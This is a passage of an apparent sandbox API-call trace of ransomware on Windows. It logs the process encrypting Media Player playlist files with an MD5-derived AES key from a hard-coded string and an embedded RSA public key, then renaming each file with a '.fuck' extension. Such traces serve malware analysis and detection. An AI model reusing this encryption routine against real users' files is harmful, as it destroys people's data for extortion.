| out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0268.243] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x90, lpOverlapped=0x0) returned 1 [0268.243] CryptEncrypt (in: hKey=0x2e18828, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x90, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0xa0) returned 1 [0268.243] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0xa0, lpOverlapped=0x0) returned 1 [0268.243] CloseHandle (hObject=0x5d4c) returned 1 [0268.243] CloseHandle (hObject=0x5d50) returned 1 [0268.243] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\07_TV_recorded_in_the_last_week.wpl.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\07_tv_recorded_in_the_last_week.wpl.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\07_TV_recorded_in_the_last_week.wpl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\07_tv_recorded_in_the_last_week.wpl"), bFailIfExists=0) returned 1 [0268.247] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\07_TV_recorded_in_the_last_week.wpl", dwFileAttributes=0x0) returned 1 [0268.247] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\07_TV_recorded_in_the_last_week.wpl.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\07_tv_recorded_in_the_last_week.wpl.gsg")) returned 1 [0268.249] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\07_TV_recorded_in_the_last_week.wpl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\07_tv_recorded_in_the_last_week.wpl"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\07_TV_recorded_in_the_last_week.wpl.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\07_tv_recorded_in_the_last_week.wpl.fuck")) returned 1 [0268.251] CryptDestroyHash (hHash=0x2e18128) returned 1 [0268.251] CryptDestroyKey (hKey=0x2e18828) returned 1 [0268.251] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0268.251] FindNextFileA (in: hFindFile=0x2e7ec80, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0268.252] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9dac8 | out: lpSystemTimeAsFileTime=0x2b9dac8) [0268.252] GetLastError () returned 0x0 [0268.252] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\08_Video_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\08_video_rated_at_4_or_5_stars.wpl")) returned 0x20 [0268.252] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\08_Video_rated_at_4_or_5_stars.wpl", dwFileAttributes=0x80) returned 1 [0268.253] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\08_Video_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\08_video_rated_at_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0268.254] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\08_Video_rated_at_4_or_5_stars.wpl.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\08_video_rated_at_4_or_5_stars.wpl.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0268.255] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\08_Video_rated_at_4_or_5_stars.wpl.gsg", dwFileAttributes=0x2) returned 1 [0268.256] CryptAcquireContextA (in: phProv=0x2b9cac4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9cac4*=0x2f25240) returned 1 [0268.258] CryptCreateHash (in: hProv=0x2f25240, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9cac8 | out: phHash=0x2b9cac8) returned 1 [0268.258] lstrlenA (lpString="ENarQtORUWLZSNndbbyWVVoTzMlQm") returned 29 [0268.258] CryptHashData (hHash=0x2e186a8, pbData=0x28cb3f0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0268.258] CryptDeriveKey (in: hProv=0x2f25240, Algid=0x6610, hBaseData=0x2e186a8, dwFlags=0x1000000, phKey=0x2b9cab4 | out: phKey=0x2b9cab4*=0x2e18828) returned 1 [0268.258] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9cad0, pcbBinary=0x2b9cab0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9cad0, pcbBinary=0x2b9cab0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0268.258] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9cad0, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9caa4, pcbStructInfo=0x2b9caac | out: pvStructInfo=0x2b9caa4, pcbStructInfo=0x2b9caac) returned 1 [0268.258] CryptAcquireContextA (in: phProv=0x2b9cac0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9cac0*=0x2f249c0) returned 1 [0268.259] CryptImportPublicKeyInfo (in: hCryptProv=0x2f249c0, dwCertEncodingType=0x1, pInfo=0x2f30480*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f304b0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f304b8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9cab8 | out: phKey=0x2b9cab8*=0x2e194a8) returned 1 [0268.259] CryptEncrypt (in: hKey=0x2e194a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9caa8*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9caa8*=0x80) returned 1 [0268.259] CryptEncrypt (in: hKey=0x2e194a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f24a48*, pdwDataLen=0x2b9cabc*=0x18, dwBufLen=0x80 | out: pbData=0x2f24a48*, pdwDataLen=0x2b9cabc*=0x80) returned 1 [0268.259] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f24a48*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x2f24a48*, lpNumberOfBytesWritten=0x2b9cacc*=0x80, lpOverlapped=0x0) returned 1 [0268.260] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0268.262] CryptEncrypt (in: hKey=0x2e18828, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0268.262] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0268.264] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x7c, lpOverlapped=0x0) returned 1 [0268.264] CryptEncrypt (in: hKey=0x2e18828, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x7c, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x80) returned 1 [0268.264] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x80, lpOverlapped=0x0) returned 1 [0268.264] CloseHandle (hObject=0x5d50) returned 1 [0268.264] CloseHandle (hObject=0x5d4c) returned 1 [0268.265] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\08_Video_rated_at_4_or_5_stars.wpl.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\08_video_rated_at_4_or_5_stars.wpl.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\08_Video_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\08_video_rated_at_4_or_5_stars.wpl"), bFailIfExists=0) returned 1 [0268.269] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\08_Video_rated_at_4_or_5_stars.wpl", dwFileAttributes=0x0) returned 1 [0268.270] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\08_Video_rated_at_4_or_5_stars.wpl.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\08_video_rated_at_4_or_5_stars.wpl.gsg")) returned 1 [0268.271] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\08_Video_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\08_video_rated_at_4_or_5_stars.wpl"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\08_Video_rated_at_4_or_5_stars.wpl.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\08_video_rated_at_4_or_5_stars.wpl.fuck")) returned 1 [0268.273] CryptDestroyHash (hHash=0x2e186a8) returned 1 [0268.273] CryptDestroyKey (hKey=0x2e18828) returned 1 [0268.273] CryptReleaseContext (hProv=0x2f25240, dwFlags=0x0) returned 1 [0268.273] FindNextFileA (in: hFindFile=0x2e7ec80, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0268.273] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9dac8 | out: lpSystemTimeAsFileTime=0x2b9dac8) [0268.273] GetLastError () returned 0x0 [0268.273] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\09_Music_played_the_most.wpl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\09_music_played_the_most.wpl")) returned 0x20 [0268.274] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\09_Music_played_the_most.wpl", dwFileAttributes=0x80) returned 1 [0268.274] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\09_Music_played_the_most.wpl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\09_music_played_the_most.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0268.275] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\09_Music_played_the_most.wpl.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\09_music_played_the_most.wpl.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0268.276] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\09_Music_played_the_most.wpl.gsg", dwFileAttributes=0x2) returned 1 [0268.277] CryptAcquireContextA (in: phProv=0x2b9cac4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9cac4*=0x2f24be0) returned 1 [0268.284] CryptCreateHash (in: hProv=0x2f24be0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9cac8 | out: phHash=0x2b9cac8) returned 1 [0268.284] lstrlenA (lpString="ENarQtORUWLZSNndbbyWVVoTzMlQm") returned 29 [0268.284] CryptHashData (hHash=0x2938378, pbData=0x28cb558, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0268.284] CryptDeriveKey (in: hProv=0x2f24be0, Algid=0x6610, hBaseData=0x2938378, dwFlags=0x1000000, phKey=0x2b9cab4 | out: phKey=0x2b9cab4*=0x29386f8) returned 1 [0268.285] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9cad0, pcbBinary=0x2b9cab0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9cad0, pcbBinary=0x2b9cab0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0268.285] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9cad0, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9caa4, pcbStructInfo=0x2b9caac | out: pvStructInfo=0x2b9caa4, pcbStructInfo=0x2b9caac) returned 1 [0268.285] CryptAcquireContextA (in: phProv=0x2b9cac0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9cac0*=0x2f262b8) returned 1 [0268.285] CryptImportPublicKeyInfo (in: hCryptProv=0x2f262b8, dwCertEncodingType=0x1, pInfo=0x2f30140*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f30170*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f30178*, PublicKey.cUnusedBits=0x0), phKey=0x2b9cab8 | out: phKey=0x2b9cab8*=0x2e186a8) returned 1 [0268.285] CryptEncrypt (in: hKey=0x2e186a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9caa8*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9caa8*=0x80) returned 1 [0268.285] CryptEncrypt (in: hKey=0x2e186a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f26098*, pdwDataLen=0x2b9cabc*=0x18, dwBufLen=0x80 | out: pbData=0x2f26098*, pdwDataLen=0x2b9cabc*=0x80) returned 1 [0268.286] WriteFile (in: hFile=0x5d50, lpBuffer=0x2f26098*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x2f26098*, lpNumberOfBytesWritten=0x2b9cacc*=0x80, lpOverlapped=0x0) returned 1 [0268.287] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0268.289] CryptEncrypt (in: hKey=0x29386f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0268.289] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0268.290] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x81, lpOverlapped=0x0) returned 1 [0268.291] CryptEncrypt (in: hKey=0x29386f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x81, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x90) returned 1 [0268.291] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x90, lpOverlapped=0x0) returned 1 [0268.291] CloseHandle (hObject=0x5d4c) returned 1 [0268.291] CloseHandle (hObject=0x5d50) returned 1 [0268.291] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\09_Music_played_the_most.wpl.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\09_music_played_the_most.wpl.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\09_Music_played_the_most.wpl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\09_music_played_the_most.wpl"), bFailIfExists=0) returned 1 [0268.294] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\09_Music_played_the_most.wpl", dwFileAttributes=0x0) returned 1 [0268.295] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\09_Music_played_the_most.wpl.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\09_music_played_the_most.wpl.gsg")) returned 1 [0268.297] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\09_Music_played_the_most.wpl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\09_music_played_the_most.wpl"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\09_Music_played_the_most.wpl.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\09_music_played_the_most.wpl.fuck")) returned 1 [0268.298] CryptDestroyHash (hHash=0x2938378) returned 1 [0268.298] CryptDestroyKey (hKey=0x29386f8) returned 1 [0268.298] CryptReleaseContext (hProv=0x2f24be0, dwFlags=0x0) returned 1 [0268.298] FindNextFileA (in: hFindFile=0x2e7ec80, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0268.298] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9dac8 | out: lpSystemTimeAsFileTime=0x2b9dac8) [0268.298] GetLastError () returned 0x0 [0268.298] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\10_All_Music.wpl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\10_all_music.wpl")) returned 0x20 [0268.298] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\10_All_Music.wpl", dwFileAttributes=0x80) returned 1 [0268.299] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\10_All_Music.wpl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\10_all_music.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0268.300] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\10_All_Music.wpl.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\10_all_music.wpl.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0268.301] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\10_All_Music.wpl.gsg", dwFileAttributes=0x2) returned 1 [0268.301] CryptAcquireContextA (in: phProv=0x2b9cac4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9cac4*=0x2f24b58) returned 1 [0268.303] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9cac8 | out: phHash=0x2b9cac8) returned 1 [0268.303] lstrlenA (lpString="ENarQtORUWLZSNndbbyWVVoTzMlQm") returned 29 [0268.303] CryptHashData (hHash=0x2e18828, pbData=0x28cb3f0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0268.303] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2e18828, dwFlags=0x1000000, phKey=0x2b9cab4 | out: phKey=0x2b9cab4*=0x2938378) returned 1 [0268.304] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9cad0, pcbBinary=0x2b9cab0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9cad0, pcbBinary=0x2b9cab0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0268.304] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9cad0, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9caa4, pcbStructInfo=0x2b9caac | out: pvStructInfo=0x2b9caa4, pcbStructInfo=0x2b9caac) returned 1 [0268.304] CryptAcquireContextA (in: phProv=0x2b9cac0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9cac0*=0x2f25240) returned 1 [0268.304] CryptImportPublicKeyInfo (in: hCryptProv=0x2f25240, dwCertEncodingType=0x1, pInfo=0x2f306f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f30720*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f30728*, PublicKey.cUnusedBits=0x0), phKey=0x2b9cab8 | out: phKey=0x2b9cab8*=0x29386f8) returned 1 [0268.304] CryptEncrypt (in: hKey=0x29386f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9caa8*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9caa8*=0x80) returned 1 [0268.304] CryptEncrypt (in: hKey=0x29386f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f24be0*, pdwDataLen=0x2b9cabc*=0x18, dwBufLen=0x80 | out: pbData=0x2f24be0*, pdwDataLen=0x2b9cabc*=0x80) returned 1 [0268.305] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f24be0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x2f24be0*, lpNumberOfBytesWritten=0x2b9cacc*=0x80, lpOverlapped=0x0) returned 1 [0268.306] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0268.308] CryptEncrypt (in: hKey=0x2938378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0268.308] 